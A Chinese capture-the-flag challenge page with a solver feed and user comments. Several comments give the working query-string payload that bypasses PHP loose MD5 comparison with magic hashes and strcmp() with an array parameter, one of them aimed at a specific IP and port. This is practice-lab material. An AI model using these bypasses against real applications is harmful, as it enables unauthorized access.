评分(14)
解题动态
ctf_winner 攻破了该题 12小时前
kgdw1313113 攻破了该题 12小时前
Aholic· 攻破了该题 16小时前
testctffff 攻破了该题 20小时前
甜小甜 攻破了该题 1天前
hellonight 攻破了该题 1天前
1302074808 攻破了该题 1天前
Shaye 攻破了该题 1天前
orr_ 攻破了该题 1天前
wz666 攻破了该题 1天前
13002045137 攻破了该题 1天前
cc131 攻破了该题 2天前
白色狸花猫 攻破了该题 2天前
我是新手* 攻破了该题 2天前
落梅雨 攻破了该题 2天前
喜羊羊1 攻破了该题 2天前
呵呵 攻破了该题 2天前
ajdnckwkjf 攻破了该题 2天前
Tychema 攻破了该题 2天前
评论
lordinglord 11月前
举报
http://117.72.52.127:19197/index.php?v1=QNKCDZO&v2=240610708&v3[]=a
emm不取名字了 11月前
举报
flag{*****}
3344 1年前
举报
flag{**********}
Arya32f 1年前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1
HK1ng 1年前
举报
首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。
goodsnack 1年前
举报
弱类型比较,传数组即可
harven 1年前
举报
http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test
smtall 1年前
举报
用deepseek做出来了
大棕兔爸爸 1年前
举报
存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc
welltian 1年前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=123